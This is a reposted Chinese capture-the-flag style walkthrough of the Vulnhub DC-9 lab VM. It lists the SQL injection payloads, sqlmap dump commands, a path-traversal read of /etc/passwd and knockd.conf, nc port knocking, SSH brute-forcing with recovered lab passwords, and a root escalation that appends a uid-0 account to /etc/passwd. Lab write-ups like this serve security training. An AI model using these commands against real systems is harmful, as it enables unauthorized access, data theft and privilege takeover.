Vulnhub | DC-9
2022/8/27 23:27:19
本文主要是介绍Vulnhub | DC-9,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
信息搜集
arp-l
发现真实IP是192.168.6.97
nmap -sS 192.168.6.97
开启 22和80端口
访问页面
SQL注入
页面有一个搜索框,尝试SQL注入
Mary
Mary' or 1=1#
Mary' or 1=2#
有漏洞,抓个包丢进SQLMAP里跑一波
python2 sqlmap.py -r 1.txt --batch --dbs
python2 sqlmap.py -r 1.txt --batch -D Staff --tables
python2 sqlmap.py -r 1.txt --batch -D Staff -T Users --dump
文件读取
这里突然提示“文件未找到”
fuzz文件路径
?file=../../../../etc/passwd
这里设计到一个端口敲门
knockd.conf是一种端口试探服务器工具。它侦听以太网或其他可用接口上的所有流量,等待特殊序列的端口命中(port-hit)。telnet或Putty等客户软件通过向服务器上的端口发送TCP或数据包来启动端口命中,也可以直接用nc敲击端口。
?file=../../../../etc/knockd.conf
nc 192.168.6.97 7469 nc 192.168.6.97 8475 nc 192.168.6.97 9842
SSH爆破
用之前得到的账号密码爆破ssh端口
login: janitor password: Ilovepeepee login: joeyt password: Passw0rd login: chandlerb password: UrAG0D!
在janitor下有隐藏文件
又发现了几个密码
再次爆破
login: fredf password: B4-Tru3-001
提权
登录上fredf用户,使用sudo -l
发现
发现一个可执行的root命令, 到 /opt/devstuff 目录看一下脚本 test.py
#!/usr/bin/python import sys if len (sys.argv) != 3 : print ("Usage: python test.py read append") sys.exit (1) else : f = open(sys.argv[1], "r") output = (f.read()) f = open(sys.argv[2], "a") f.write(output) f.close()
是一个写入文件的脚本,生成一个密码用root权限执行脚本写入 /etc/passwd 文件
openssl passwd -1 -salt saul 123456# 生成 passwd 密码的 hash 值 # 在 tmp 创建一个 raj 文件,里面是我们的密码sudo ./test /tmp/raj /etc/passwd echo 'saul:$1$saul$HqxyWB6MwTZbm/LiAFFZX.:0:0::/root:/bin/bash' >> /tmp/raj sudo /opt/devstuff/dist/test/test /tmp/raj /etc/passwd # 写入passwd su salt
这篇关于Vulnhub | DC-9的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-05-15PingCAP 黄东旭参与 CCF 秀湖会议,共探开源教育未来
- 2024-05-13PingCAP 戴涛:构建面向未来的金融核心系统
- 2024-05-09flutter3.x_macos桌面os实战
- 2024-05-09Rust中的并发性:Sync 和 Send Traits
- 2024-05-08使用Ollama和OpenWebUI在CPU上玩转Meta Llama3-8B
- 2024-05-08完工标准(DoD)与验收条件(AC)究竟有什么不同?
- 2024-05-084万 star 的 NocoDB 在 sealos 上一键起,轻松把数据库编程智能表格
- 2024-05-08Mac 版Stable Diffusion WebUI的安装
- 2024-05-08解锁CodeGeeX智能问答中3项独有的隐藏技能
- 2024-05-08RAG算法优化+新增代码仓库支持,CodeGeeX的@repo功能效果提升